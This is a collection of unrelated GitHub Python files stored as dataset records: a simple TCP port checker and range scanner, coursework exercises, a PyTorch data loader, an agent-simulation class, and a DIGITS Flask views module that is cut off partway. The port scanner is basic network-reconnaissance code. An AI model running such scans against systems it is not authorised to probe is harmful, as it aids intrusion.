TCP biçiminde iletişime geçer.\ns = socket.socket(socket.AF_INET , socket.SOCK_STREAM) # \"socket.AF_INET\" takes the IP address information, connects to the web site and exchanges data.\noption = int(input(\"Option >> \")) \nif option == 3 : \n    print(\"exit...\")\n    exit\n\nelif option == 1 : \n    target = input(\"Target Website / Ip >> \")\n    port = int(input(\"Port >> \"))\n    try:\n        s.connect((target , port)) # connect to the given target and port to check it.\n        print(\"Port open >> {}\".format(port))\n    except:\n        print(\"Port Close >> {}\".format(port))\n\nelif option == 2 : \n    target = input(\"Target Website / Ip >> \")\n    Min = int(input(\"Minimum Port >> \")) \n    Max = int(input(\"Maximum Port >> \"))\n\n    for Port in range(Min , Max + 1) : # range() makes the scan cover the given ports and every number between them.\n        try:\n            s.connect((target , Port)) # connect to each port between min and max to check it.\n            print(\"Port Open >> {}\".format(Port))\n            break # if everything went fine, end the loop.\n        except: \n            print(\"Port Close >> {}\".format(Port))\n\nelse : \n    print(\"error :(\")\n    exit \n","repo_name":"exninee/Port-Checker-and-Port-Scanner","sub_path":"port/port.py","file_name":"port.py","file_ext":"py","file_size_in_byte":1675,"program_lang":"python","lang":"tr","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"}{"seq_id":"29252960305","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sat Jul 16 11:52:13 2016\n\n@author: kuangyiyun\n\"\"\"\nimport re\n\n\"\"\"Assignment: Regular Expression\"\"\"\ndocu = open(\"regex_sum_262392.txt\")\ndocu = open(\"regex_sum_42.txt\") # NOTE: this second open() replaces the first, so only the sample file is read\nresult = []\ni = 1\nfor line in docu:\n    line = line.strip()\n    #print (line)\n    numbers = re.findall('[0-9]+', line)\n    for item in numbers:\n        result.append(item)\n    #print (numbers)\n    #print (result)\n    #i = i + 1\n    #if i > 20:\n        #break\nnum_sum = 0\nfor i in result:\n    num_sum = num_sum + int(i)\nprint (num_sum)\n    ","repo_name":"kyyeve/Python-for-Informatics-Exercise","sub_path":"Assignment_Regular_Expression.py","file_name":"Assignment_Regular_Expression.py","file_ext":"py","file_size_in_byte":534,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"}{"seq_id":"44032414728","text":"import torch\r\nimport os\r\nimport pdb\r\nimport pickle\r\nimport nltk\r\nfrom torch.utils import data\r\nfrom collections import Counter,defaultdict\r\n\r\n\r\n\r\n# build the vocabulary\r\ndef set_vocab(train_texts):\t\r\n\tif os.path.exists('./data/vocab.txt'): # if the vocab file already exists\r\n\t\twith open('./data/vocab.txt','r',encoding='utf-8') as fr:\r\n\t\t\tvocab_words = [line.strip() for line in fr.readlines()]\r\n\telse:\r\n\t\ttrain_words = []\r\n\t\tfor text in train_texts:\r\n\t\t\ttrain_words.extend(text)\r\n\r\n\t\t# count word frequencies\r\n\t\tcommon_words = Counter(train_words).most_common()\r\n\t\tvocab_words = ['[UNK]','[PAD]']+[word[0] for word in common_words]\r\n\t\t# write out the vocabulary\r\n\t\tfw = open('./data/vocab.txt','w',encoding='utf-8')\r\n\t\tfor word in vocab_words:\r\n\t\t\tfw.write(word+'\\n')\r\n\tprint('vocab loaded!')\r\n\treturn vocab_words\r\n\r\n\r\n# load the data and build iterators\r\ndef load_data(args):\r\n\tprint('loading datas......')\r\n\twith open('./data/data.pkl', 'rb') as inp:\r\n\t    train_texts = pickle.load(inp)\r\n\t    train_labels = pickle.load(inp)\r\n\t    test_texts = pickle.load(inp)\r\n\t    test_labels = pickle.load(inp)\r\n\r\n\tif args.pretrained: # load the pretrained word vectors and use their vocabulary\r\n\t\twith open('./data/wvmodel.pkl', 'rb') as inp:\r\n\t\t    wvmodel = pickle.load(inp)\r\n\t\tvocab_words = 
list(wvmodel.vocab.keys())\r\n\telse:\r\n\t\tvocab_words = set_vocab(train_texts)\r\n\r\n\t# map each word to an index\r\n\tword2idx = defaultdict(lambda :0) # defaults to 0 --- UNK\r\n\tfor idx, word in enumerate(vocab_words):\r\n\t\tword2idx[word] = idx \r\n\r\n\r\n\t# truncate to the maximum sentence length and pad shorter sentences\r\n\ttrain_texts = [line[:args.max_len] for line in train_texts]\r\n\ttest_texts = [line[:args.max_len] for line in test_texts]\r\n\ttrain_texts = [line + ['[PAD]' for i in range(args.max_len-len(line))] for line in train_texts]\r\n\ttest_texts = [line + ['[PAD]' for i in range(args.max_len-len(line))] for line in test_texts]\r\n\r\n\t# build the dataset: each sentence becomes a sequence of indices\r\n\ttrain_datas = [[word2idx[word] for word in text] for text in train_texts]\r\n\ttest_datas = [[word2idx[word] for word in text] for text in test_texts]\r\n\r\n\ttrain_datas = torch.tensor(train_datas)\r\n\ttest_datas = torch.tensor(test_datas)\r\n\ttrain_labels = torch.tensor(train_labels)\r\n\ttest_labels = torch.tensor(test_labels)\r\n\r\n\r\n\ttrain_datasets = data.TensorDataset(train_datas,train_labels)\r\n\ttest_datasets = data.TensorDataset(test_datas,test_labels)\r\n\r\n\t# build the iterators\r\n\ttrain_iter = data.DataLoader(train_datasets,args.batch_size,shuffle=True,num_workers=2)\r\n\ttest_iter = data.DataLoader(test_datasets,args.batch_size,shuffle=True,num_workers=2)\r\n\r\n\r\n\tprint('datas loaded!')\r\n\treturn train_iter,test_iter,vocab_words\r\n\r\n\r\n    ","repo_name":"HuihuiChyan/BJTUNLP_Practice2020","sub_path":"text_classification/20125185/data_process2.py","file_name":"data_process2.py","file_ext":"py","file_size_in_byte":2600,"program_lang":"python","lang":"en","doc_type":"code","stars":18,"dataset":"github-code","pt":"48"}{"seq_id":"5284845185","text":"from .agent import * # random and mean are expected to come in via this wildcard import\n\nclass AntiAgent(Agent):\n    def __init__(self, unique_id, group, model, fac=None, fMove=None, falign=None):\n        super().__init__(unique_id, model, group)\n        self.payoff = 0\n        coop = random.random()\n        self.firstMove = fMove if fMove is not None else coop\n        self.biased_coop_level = self.firstMove\n        self.prevAct = {}\n        self.faction = fac\n        \n        self.wealth = 1000 # Around 3 times \n        # self.wealth = 230 # 30% of avg observed\n        mu = 0.5\n        sigma = 0.2\n        self.fac_align = falign if falign is not None else random.gauss(mu, sigma)\n        self.bias = random.gauss(mu, sigma)\n        if (self.fac_align < 0):\n            self.fac_align = 0\n        elif(self.fac_align > 1):\n            self.fac_align = 1\n\n        if (self.bias < 0):\n            self.bias = 0\n        elif(self.bias > 1):\n            self.bias = 1\n        \n        # Keeping track of difference updates\n        self.fac_diff = []\n        self.payoff_diff_lst = []\n\n    def getPayoff(self):\n        return self.payoff\n    \n    def getBias(self, other_agent_group):\n        if (other_agent_group == self.group_id):\n            return self.bias #2\n        else:\n            return 0\n    \n    def getFaction(self):\n        return self.faction\n\n    def getWealth(self):\n        return self.wealth\n    \n    def getSocialStatus(self):\n        return self.current_social_status\n    \n    def setFaction(self, fact):\n        self.faction = fact\n\n    def recieveBroadcast(self, bias_value, against_group):\n        return 0\n\n    def isAnti(self):\n        return True\n\n    def getGroupsBiasedAgainst(self):\n        return [self.group_id]\n\t\n    def getFactionAlignment(self, lalal):\n        return 0\n\n\n\n    def getOpinion(self, other_agent): \n        if(self.group_id != other_agent.getGroupId()):\n            if(other_agent.getId() in self.prevAct):\n                unbiased_coop = mean(self.prevAct.get(other_agent.getId()))\n            
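# no recorded interactions with this out-group agent yet, so fall back to firstMove\n            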
else:\n unbiased_coop = self.firstMove\n \n biased_coop = (1 - self.bias) * unbiased_coop\n # self.coop_level = self.prevAct.get(other_agent.getId(), self.firstMove)\n return round(biased_coop, 2)\n\n def getCoop(self, other_agent):\n self.biased_coop_level = self.getOpinion(other_agent)\n return self.biased_coop_level\n\n\n\n def updateTheta(self, other_agent, coop, payoff_self):\n self.payoff += payoff_self\n self.interactions.append(payoff_self)\n\n agentMemorySize = 10\n\n maxPayoff = 5\n # minPayoff = 0\n \n biasIncreaseThreshold = 0.45\n biasDecreaseThreshold = 0.35\n biasDelta = 0.005\n\n facAlignIncreaseThreshold, facAlignDecreaseThreshold = facalignCalc(self.fac_align)\n facAlignDelta = 0.005\n \n # BiasUpdation\n self.payoff_diff_lst.append(payoff_self)\n if(payoff_self >= (biasIncreaseThreshold * maxPayoff)):\n self.bias = self.bias + biasDelta\n if(self.bias > 1):\n self.bias = 1\n\n if(payoff_self < (biasDecreaseThreshold * maxPayoff)):\n self.bias = self.bias - biasDelta\n if(self.bias < 0):\n self.bias = 0\n \n # FactionAlignmentUpdation\n # if (self.faction != None):\n # self.fac_diff.append(abs(self.bias - self.faction.getFacBias(self)))\n # if(abs(self.bias - self.faction.getFacBias(self)) < facAlignIncreaseThreshold):\n # self.fac_align = self.fac_align + facAlignDelta\n # if(self.fac_align > 1):\n # self.fac_align = 1\n \n # elif(abs(self.bias - self.faction.getFacBias(self)) > facAlignDecreaseThreshold):\n # self.fac_align = self.fac_align - facAlignDelta\n # if(self.fac_align < 0):\n # self.fac_align = 0\n \n if(other_agent.getId() in self.prevAct):\n experience_lst = self.prevAct.get(other_agent.getId())\n if(len(experience_lst) < agentMemorySize):\n experience_lst.append(coop)\n else:\n experience_lst.pop(0)\n experience_lst.append(coop)\n else:\n self.prevAct.update({other_agent.getId(): [coop]})\n\n","repo_name":"deep-inder/prejudice_model","sub_path":"nGroups/antiAgent.py","file_name":"antiAgent.py","file_ext":"py","file_size_in_byte":4579,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"49623671","text":"# George Orwell Novels = GON\n# lower case = lc\nslots = [\"Mon am\", \"Mon pm\", \"Tue am\", \"Tue pm\", \"Wed am\", \"Wed pm\", \"Thu am\", \"Thu pm\", \"Fri am\", \"Fri pm\"]\nlc_slots = [ x.lower() for x in slots]\nslots_range = len(slots)-1\nprompt = \":> \"\nselected_slot_1 = \"\"\nselected_slot_2 = \"\"\ninput_matched = False\n\n\n\n\nprint(\"Please pick a time for your session: \")\nfor i in range (0,slots_range):\n print(f\"{slots[i]}\")\nlc_user_input = input(prompt).lower()\n\nday = lc_user_input.split(' ', 1)\nday_2_char = day[2:]\n\nprint(lc_user_input)\nprint(day_2_char)\n\nif day in lc_slots:\n app_day = day\nelse:\n for i in range(0,slots_range):\n if day_2_char in lc_slots[i]:\n #print(\"Did you mean:\", GON[i], \" Y/N?\")\n user_answer = input(prompt)\n if user_answer == \"Y\" or \"y\":\n\n input_matched = True\n","repo_name":"keith-taylor/The-Hard-Way","sub_path":"ex38_appoinments.py","file_name":"ex38_appoinments.py","file_ext":"py","file_size_in_byte":846,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"38957210624","text":"# 백준 10996번 문제. 
Star printing - 21\n# running time 80ms\nN = int(input())\n\nlst1 = [' ' for i in range(N)]\nlst2 = [' ' for i in range(N)]\n\nfor i in range(N):\n    if N == 0:\n        print('*')\n    else:\n        for j in range(N):\n            if j % 2 == 0:\n                lst1[j] = '*'\n            else:\n                lst2[j] = '*'\nfor x in range(N):\n    for y in range(N):\n        print(lst1[y], end='')\n    print()\n    for y in range(N):\n        print(lst2[y], end='')\n    print()\n\n\"\"\"\nOther people's solutions\n#1\nnum = input()\nnum = int(num)\nmessage_1 = ''\nmessage_2 = ''\nfor count_1 in range(num-int(num/2)):\n\tmessage_1 += '* '\nfor count_2 in range(int(num/2)):\n\tmessage_2 += ' *'\nfor count in range(num):\n\tprint(message_1 + '\\n' + message_2)\nPairing the '*' and the space cut the running time to 56ms.\n\n#2\nn=int(input())\nprint(('* '*((n+1)//2)+'\\n'+' *'*(n//2)+'\\n')*n,end='')\n\nThis also pairs the '*' and the space like the solution above, but\nby using the // operator it gets even shorter code and the shortest running time (52ms).\n\"\"\"\n","repo_name":"Min-h-96/PS","sub_path":"Python/실습1/10996.py","file_name":"10996.py","file_ext":"py","file_size_in_byte":1042,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"}{"seq_id":"74584335824","text":"from __future__ import absolute_import\n\nimport os\nimport re\nimport tempfile\n\nimport flask\nimport werkzeug.exceptions\n\nfrom .forms import GenericImageModelForm\nfrom .job import GenericImageModelJob\nfrom digits.pretrained_model.job import PretrainedModelJob\nfrom digits import extensions, frameworks, utils\nfrom digits.config import config_value\nfrom digits.dataset import GenericDatasetJob, GenericImageDatasetJob\nfrom digits.inference import ImageInferenceJob\nfrom digits.status import Status\nfrom digits.utils import filesystem as fs\nfrom digits.utils import constants\nfrom digits.utils.forms import fill_form_if_cloned, save_form_to_job\nfrom digits.utils.routing import request_wants_json, job_from_request\nfrom digits.webapp import scheduler\n\nblueprint = flask.Blueprint(__name__, __name__)\n\n\n@blueprint.route('/new', methods=['GET'])\n@blueprint.route('/new/<extension_id>', methods=['GET'])\n@utils.auth.requires_login\ndef new(extension_id=None):\n    \"\"\"\n    Return a form for a new GenericImageModelJob\n    \"\"\"\n    form = GenericImageModelForm()\n    form.dataset.choices = get_datasets(extension_id)\n    form.standard_networks.choices = []\n    form.previous_networks.choices = get_previous_networks()\n    form.pretrained_networks.choices = get_pretrained_networks()\n    prev_network_snapshots = get_previous_network_snapshots()\n\n    # Is there a request to clone a job with ?clone=<job_id>\n    fill_form_if_cloned(form)\n\n    return flask.render_template(\n        'models/images/generic/new.html',\n        extension_id=extension_id,\n        extension_title=extensions.data.get_extension(extension_id).get_title() if extension_id else None,\n        form=form,\n        frameworks=frameworks.get_frameworks(),\n        previous_network_snapshots=prev_network_snapshots,\n        previous_networks_fullinfo=get_previous_networks_fulldetails(),\n        pretrained_networks_fullinfo=get_pretrained_networks_fulldetails(),\n        multi_gpu=config_value('caffe')['multi_gpu'],\n    )\n\n\n@blueprint.route('/json', methods=['POST'])\n@blueprint.route('', methods=['POST'], strict_slashes=False)\n@blueprint.route('/<extension_id>/json', methods=['POST'])\n@blueprint.route('/<extension_id>', methods=['POST'], strict_slashes=False)\n@utils.auth.requires_login(redirect=False)\ndef create(extension_id=None):\n    \"\"\"\n    Create a new GenericImageModelJob\n\n    Returns JSON when requested: {job_id,name,status} or {errors:[]}\n    \"\"\"\n    form = GenericImageModelForm()\n    form.dataset.choices = get_datasets(extension_id)\n    
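# keep these choices in sync with new() above so the posted values pass form validation\n    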
form.standard_networks.choices = []\n form.previous_networks.choices = get_previous_networks()\n form.pretrained_networks.choices = get_pretrained_networks()\n\n prev_network_snapshots = get_previous_network_snapshots()\n\n # Is there a request to clone a job with ?clone=\n fill_form_if_cloned(form)\n\n if not form.validate_on_submit():\n if request_wants_json():\n return flask.jsonify({'errors': form.errors}), 400\n else:\n return flask.render_template(\n 'models/images/generic/new.html',\n extension_id=extension_id,\n extension_title=extensions.data.get_extension(extension_id).get_title() if extension_id else None,\n form=form,\n frameworks=frameworks.get_frameworks(),\n previous_network_snapshots=prev_network_snapshots,\n previous_networks_fullinfo=get_previous_networks_fulldetails(),\n pretrained_networks_fullinfo=get_pretrained_networks_fulldetails(),\n multi_gpu=config_value('caffe')['multi_gpu'],\n ), 400\n\n datasetJob = scheduler.get_job(form.dataset.data)\n if not datasetJob:\n raise werkzeug.exceptions.BadRequest(\n 'Unknown dataset job_id \"%s\"' % form.dataset.data)\n\n # sweeps will be a list of the the permutations of swept fields\n # Get swept learning_rate\n sweeps = [{'learning_rate': v} for v in form.learning_rate.data]\n add_learning_rate = len(form.learning_rate.data) > 1\n\n # Add swept batch_size\n sweeps = [dict(s.items() + [('batch_size', bs)]) for bs in form.batch_size.data for s in sweeps[:]]\n add_batch_size = len(form.batch_size.data) > 1\n n_jobs = len(sweeps)\n\n jobs = []\n for sweep in sweeps:\n # Populate the form with swept data to be used in saving and\n # launching jobs.\n form.learning_rate.data = sweep['learning_rate']\n form.batch_size.data = sweep['batch_size']\n\n # Augment Job Name\n extra = ''\n if add_learning_rate:\n extra += ' learning_rate:%s' % str(form.learning_rate.data[0])\n if add_batch_size:\n extra += ' batch_size:%d' % form.batch_size.data[0]\n\n job = None\n try:\n job = GenericImageModelJob(\n username=utils.auth.get_username(),\n name=form.model_name.data + extra,\n group=form.group_name.data,\n dataset_id=datasetJob.id(),\n )\n\n # get framework (hard-coded to caffe for now)\n fw = frameworks.get_framework_by_id(form.framework.data)\n\n pretrained_model = None\n # if form.method.data == 'standard':\n if form.method.data == 'previous':\n old_job = scheduler.get_job(form.previous_networks.data)\n if not old_job:\n raise werkzeug.exceptions.BadRequest(\n 'Job not found: %s' % form.previous_networks.data)\n\n use_same_dataset = (old_job.dataset_id == job.dataset_id)\n network = fw.get_network_from_previous(old_job.train_task().network, use_same_dataset)\n\n for choice in form.previous_networks.choices:\n if choice[0] == form.previous_networks.data:\n epoch = float(flask.request.form['%s-snapshot' % form.previous_networks.data])\n if epoch == 0:\n pass\n elif epoch == -1:\n pretrained_model = old_job.train_task().pretrained_model\n else:\n # verify snapshot exists\n pretrained_model = old_job.train_task().get_snapshot(epoch, download=True)\n if pretrained_model is None:\n raise werkzeug.exceptions.BadRequest(\n \"For the job %s, selected pretrained_model for epoch %d is invalid!\"\n % (form.previous_networks.data, epoch))\n\n # the first is the actual file if a list is returned, other should be meta data\n if isinstance(pretrained_model, list):\n pretrained_model = pretrained_model[0]\n\n if not (os.path.exists(pretrained_model)):\n raise werkzeug.exceptions.BadRequest(\n \"Pretrained_model for the selected epoch doesn't exist. 
\"\n \"May be deleted by another user/process. \"\n \"Please restart the server to load the correct pretrained_model details.\")\n # get logical path\n pretrained_model = old_job.train_task().get_snapshot(epoch)\n break\n elif form.method.data == 'pretrained':\n pretrained_job = scheduler.get_job(form.pretrained_networks.data)\n model_def_path = pretrained_job.get_model_def_path()\n weights_path = pretrained_job.get_weights_path()\n\n network = fw.get_network_from_path(model_def_path)\n pretrained_model = weights_path\n\n elif form.method.data == 'custom':\n network = fw.get_network_from_desc(form.custom_network.data)\n pretrained_model = form.custom_network_snapshot.data.strip()\n else:\n raise werkzeug.exceptions.BadRequest(\n 'Unrecognized method: \"%s\"' % form.method.data)\n\n policy = {'policy': form.lr_policy.data}\n if form.lr_policy.data == 'fixed':\n pass\n elif form.lr_policy.data == 'step':\n policy['stepsize'] = form.lr_step_size.data\n policy['gamma'] = form.lr_step_gamma.data\n elif form.lr_policy.data == 'multistep':\n policy['stepvalue'] = form.lr_multistep_values.data\n policy['gamma'] = form.lr_multistep_gamma.data\n elif form.lr_policy.data == 'exp':\n policy['gamma'] = form.lr_exp_gamma.data\n elif form.lr_policy.data == 'inv':\n policy['gamma'] = form.lr_inv_gamma.data\n policy['power'] = form.lr_inv_power.data\n elif form.lr_policy.data == 'poly':\n policy['power'] = form.lr_poly_power.data\n elif form.lr_policy.data == 'sigmoid':\n policy['stepsize'] = form.lr_sigmoid_step.data\n policy['gamma'] = form.lr_sigmoid_gamma.data\n else:\n raise werkzeug.exceptions.BadRequest(\n 'Invalid learning rate policy')\n\n if config_value('caffe')['multi_gpu']:\n if form.select_gpu_count.data:\n gpu_count = form.select_gpu_count.data\n selected_gpus = None\n else:\n selected_gpus = [str(gpu) for gpu in form.select_gpus.data]\n gpu_count = None\n else:\n if form.select_gpu.data == 'next':\n gpu_count = 1\n selected_gpus = None\n else:\n selected_gpus = [str(form.select_gpu.data)]\n gpu_count = None\n\n # Set up data augmentation structure\n data_aug = {}\n data_aug['flip'] = form.aug_flip.data\n data_aug['quad_rot'] = form.aug_quad_rot.data\n data_aug['rot'] = form.aug_rot.data\n data_aug['scale'] = form.aug_scale.data\n data_aug['noise'] = form.aug_noise.data\n data_aug['contrast'] = form.aug_contrast.data\n data_aug['whitening'] = form.aug_whitening.data\n data_aug['hsv_use'] = form.aug_hsv_use.data\n data_aug['hsv_h'] = form.aug_hsv_h.data\n data_aug['hsv_s'] = form.aug_hsv_s.data\n data_aug['hsv_v'] = form.aug_hsv_v.data\n\n # Python Layer File may be on the server or copied from the client.\n fs.copy_python_layer_file(\n bool(form.python_layer_from_client.data),\n job.dir(),\n (flask.request.files[form.python_layer_client_file.name]\n if form.python_layer_client_file.name in flask.request.files\n else ''), form.python_layer_server_file.data)\n\n job.tasks.append(fw.create_train_task(\n job=job,\n dataset=datasetJob,\n train_epochs=form.train_epochs.data,\n snapshot_interval=form.snapshot_interval.data,\n learning_rate=form.learning_rate.data[0],\n lr_policy=policy,\n gpu_count=gpu_count,\n selected_gpus=selected_gpus,\n batch_size=form.batch_size.data[0],\n batch_accumulation=form.batch_accumulation.data,\n val_interval=form.val_interval.data,\n traces_interval=form.traces_interval.data,\n pretrained_model=pretrained_model,\n crop_size=form.crop_size.data,\n use_mean=form.use_mean.data,\n network=network,\n random_seed=form.random_seed.data,\n 
solver_type=form.solver_type.data,\n rms_decay=form.rms_decay.data,\n shuffle=form.shuffle.data,\n data_aug=data_aug,\n )\n )\n\n # Save form data with the job so we can easily clone it later.\n save_form_to_job(job, form)\n\n jobs.append(job)\n scheduler.add_job(job)\n if n_jobs == 1:\n if request_wants_json():\n return flask.jsonify(job.json_dict())\n else:\n return flask.redirect(flask.url_for('digits.model.views.show', job_id=job.id()))\n\n except:\n if job:\n scheduler.delete_job(job)\n raise\n\n if request_wants_json():\n return flask.jsonify(jobs=[j.json_dict() for j in jobs])\n\n # If there are multiple jobs launched, go to the home page.\n return flask.redirect('/')\n\n\ndef show(job, related_jobs=None):\n \"\"\"\n Called from digits.model.views.models_show()\n \"\"\"\n data_extensions = get_data_extensions()\n view_extensions = get_view_extensions()\n\n return flask.render_template(\n 'models/images/generic/show.html',\n job=job,\n data_extensions=data_extensions,\n view_extensions=view_extensions,\n related_jobs=related_jobs,\n )\n\n\n@blueprint.route('/timeline_tracing', methods=['GET'])\ndef timeline_tracing():\n \"\"\"\n Shows timeline trace of a model\n \"\"\"\n job = job_from_request()\n\n return flask.render_template('models/timeline_tracing.html', job=job)\n\n\n@blueprint.route('/large_graph', methods=['GET'])\ndef large_graph():\n \"\"\"\n Show the loss/accuracy graph, but bigger\n \"\"\"\n job = job_from_request()\n\n return flask.render_template('models/large_graph.html', job=job)\n\n\n@blueprint.route('/infer_one/json', methods=['POST'])\n@blueprint.route('/infer_one', methods=['POST', 'GET'])\ndef infer_one():\n \"\"\"\n Infer one image\n \"\"\"\n model_job = job_from_request()\n\n remove_image_path = False\n if 'image_path' in flask.request.form and flask.request.form['image_path']:\n image_path = flask.request.form['image_path']\n elif 'image_file' in flask.request.files and flask.request.files['image_file']:\n outfile = tempfile.mkstemp(suffix='.bin')\n flask.request.files['image_file'].save(outfile[1])\n image_path = outfile[1]\n os.close(outfile[0])\n remove_image_path = True\n else:\n raise werkzeug.exceptions.BadRequest('must provide image_path or image_file')\n\n epoch = None\n if 'snapshot_epoch' in flask.request.form:\n epoch = float(flask.request.form['snapshot_epoch'])\n\n layers = 'none'\n if 'show_visualizations' in flask.request.form and flask.request.form['show_visualizations']:\n layers = 'all'\n\n if 'dont_resize' in flask.request.form and flask.request.form['dont_resize']:\n resize = False\n else:\n resize = True\n\n # create inference job\n inference_job = ImageInferenceJob(\n username=utils.auth.get_username(),\n name=\"Infer One Image\",\n model=model_job,\n images=[image_path],\n epoch=epoch,\n layers=layers,\n resize=resize,\n )\n\n # schedule tasks\n scheduler.add_job(inference_job)\n\n # wait for job to complete\n inference_job.wait_completion()\n\n # retrieve inference data\n inputs, outputs, model_visualization = inference_job.get_data()\n\n # set return status code\n status_code = 500 if inference_job.status == 'E' else 200\n\n # delete job folder and remove from scheduler list\n scheduler.delete_job(inference_job)\n\n if remove_image_path:\n os.remove(image_path)\n\n if inputs is not None and len(inputs['data']) == 1:\n image = utils.image.embed_image_html(inputs['data'][0])\n visualizations, header_html, app_begin_html, app_end_html = get_inference_visualizations(\n model_job.dataset,\n inputs,\n outputs)\n inference_view_html = 
visualizations[0]\n else:\n image = None\n inference_view_html = None\n header_html = None\n app_begin_html = None\n app_end_html = None\n\n if request_wants_json():\n return flask.jsonify({'outputs': dict((name, blob.tolist())\n for name, blob in outputs.iteritems())}), status_code\n else:\n return flask.render_template(\n 'models/images/generic/infer_one.html',\n model_job=model_job,\n job=inference_job,\n image_src=image,\n inference_view_html=inference_view_html,\n header_html=header_html,\n app_begin_html=app_begin_html,\n app_end_html=app_end_html,\n visualizations=model_visualization,\n total_parameters=sum(v['param_count'] for v in model_visualization\n if v['vis_type'] == 'Weights'),\n ), status_code\n\n\n@blueprint.route('/infer_extension/json', methods=['POST'])\n@blueprint.route('/infer_extension', methods=['POST', 'GET'])\ndef infer_extension():\n \"\"\"\n Perform inference using the data from an extension inference form\n \"\"\"\n model_job = job_from_request()\n\n inference_db_job = None\n try:\n if 'data_extension_id' in flask.request.form:\n data_extension_id = flask.request.form['data_extension_id']\n else:\n data_extension_id = model_job.dataset.extension_id\n\n # create an inference database\n inference_db_job = create_inference_db(model_job, data_extension_id)\n db_path = inference_db_job.get_feature_db_path(constants.TEST_DB)\n\n # create database creation job\n epoch = None\n if 'snapshot_epoch' in flask.request.form:\n epoch = float(flask.request.form['snapshot_epoch'])\n\n layers = 'none'\n if 'show_visualizations' in flask.request.form and flask.request.form['show_visualizations']:\n layers = 'all'\n\n # create inference job\n inference_job = ImageInferenceJob(\n username=utils.auth.get_username(),\n name=\"Inference\",\n model=model_job,\n images=db_path,\n epoch=epoch,\n layers=layers,\n resize=False,\n )\n\n # schedule tasks\n scheduler.add_job(inference_job)\n\n # wait for job to complete\n inference_job.wait_completion()\n\n finally:\n if inference_db_job:\n scheduler.delete_job(inference_db_job)\n\n # retrieve inference data\n inputs, outputs, model_visualization = inference_job.get_data()\n\n # set return status code\n status_code = 500 if inference_job.status == 'E' else 200\n\n # delete job folder and remove from scheduler list\n scheduler.delete_job(inference_job)\n\n if outputs is not None and len(outputs) < 1:\n # an error occurred\n outputs = None\n\n if inputs is not None:\n keys = [str(idx) for idx in inputs['ids']]\n inference_views_html, header_html, app_begin_html, app_end_html = get_inference_visualizations(\n model_job.dataset,\n inputs,\n outputs)\n else:\n inference_views_html = None\n header_html = None\n keys = None\n app_begin_html = None\n app_end_html = None\n\n if request_wants_json():\n result = {}\n for i, key in enumerate(keys):\n result[key] = dict((name, blob[i].tolist()) for name, blob in outputs.iteritems())\n return flask.jsonify({'outputs': result}), status_code\n else:\n return flask.render_template(\n 'models/images/generic/infer_extension.html',\n model_job=model_job,\n job=inference_job,\n keys=keys,\n inference_views_html=inference_views_html,\n header_html=header_html,\n app_begin_html=app_begin_html,\n app_end_html=app_end_html,\n visualizations=model_visualization,\n total_parameters=sum(v['param_count'] for v in model_visualization\n if v['vis_type'] == 'Weights'),\n ), status_code\n\n\n@blueprint.route('/infer_db/json', methods=['POST'])\n@blueprint.route('/infer_db', methods=['POST', 'GET'])\ndef infer_db():\n 
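# batch inference over a whole feature database rather than a single image\n    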
\"\"\"\n Infer a database\n \"\"\"\n model_job = job_from_request()\n\n if 'db_path' not in flask.request.form or flask.request.form['db_path'] is None:\n raise werkzeug.exceptions.BadRequest('db_path is a required field')\n\n db_path = flask.request.form['db_path']\n\n if not os.path.exists(db_path):\n raise werkzeug.exceptions.BadRequest('DB \"%s\" does not exit' % db_path)\n\n epoch = None\n if 'snapshot_epoch' in flask.request.form:\n epoch = float(flask.request.form['snapshot_epoch'])\n\n if 'dont_resize' in flask.request.form and flask.request.form['dont_resize']:\n resize = False\n else:\n resize = True\n\n # create inference job\n inference_job = ImageInferenceJob(\n username=utils.auth.get_username(),\n name=\"Infer Many Images\",\n model=model_job,\n images=db_path,\n epoch=epoch,\n layers='none',\n resize=resize,\n )\n\n # schedule tasks\n scheduler.add_job(inference_job)\n\n # wait for job to complete\n inference_job.wait_completion()\n\n # retrieve inference data\n inputs, outputs, _ = inference_job.get_data()\n\n # set return status code\n status_code = 500 if inference_job.status == 'E' else 200\n\n # delete job folder and remove from scheduler list\n scheduler.delete_job(inference_job)\n\n if outputs is not None and len(outputs) < 1:\n # an error occurred\n outputs = None\n\n if inputs is not None:\n keys = [str(idx) for idx in inputs['ids']]\n inference_views_html, header_html, app_begin_html, app_end_html = get_inference_visualizations(\n model_job.dataset,\n inputs,\n outputs)\n else:\n inference_views_html = None\n header_html = None\n keys = None\n app_begin_html = None\n app_end_html = None\n\n if request_wants_json():\n result = {}\n for i, key in enumerate(keys):\n result[key] = dict((name, blob[i].tolist()) for name, blob in outputs.iteritems())\n return flask.jsonify({'outputs': result}), status_code\n else:\n return flask.render_template(\n 'models/images/generic/infer_db.html',\n model_job=model_job,\n job=inference_job,\n keys=keys,\n inference_views_html=inference_views_html,\n header_html=header_html,\n app_begin_html=app_begin_html,\n app_end_html=app_end_html,\n ), status_code\n\n\n@blueprint.route('/infer_many/json', methods=['POST'])\n@blueprint.route('/infer_many', methods=['POST', 'GET'])\ndef infer_many():\n \"\"\"\n Infer many images\n \"\"\"\n model_job = job_from_request()\n\n image_list = flask.request.files.get('image_list')\n if not image_list:\n raise werkzeug.exceptions.BadRequest('image_list is a required field')\n\n if 'image_folder' in flask.request.form and flask.request.form['image_folder'].strip():\n image_folder = flask.request.form['image_folder']\n if not os.path.exists(image_folder):\n raise werkzeug.exceptions.BadRequest('image_folder \"%s\" does not exit' % image_folder)\n else:\n image_folder = None\n\n if 'num_test_images' in flask.request.form and flask.request.form['num_test_images'].strip():\n num_test_images = int(flask.request.form['num_test_images'])\n else:\n num_test_images = None\n\n epoch = None\n if 'snapshot_epoch' in flask.request.form:\n epoch = float(flask.request.form['snapshot_epoch'])\n\n if 'dont_resize' in flask.request.form and flask.request.form['dont_resize']:\n resize = False\n else:\n resize = True\n\n paths = []\n\n for line in image_list.readlines():\n line = line.strip()\n if not line:\n continue\n\n path = None\n # might contain a numerical label at the end\n match = re.match(r'(.*\\S)\\s+\\d+$', line)\n if match:\n path = match.group(1)\n else:\n path = line\n\n if not utils.is_url(path) and 
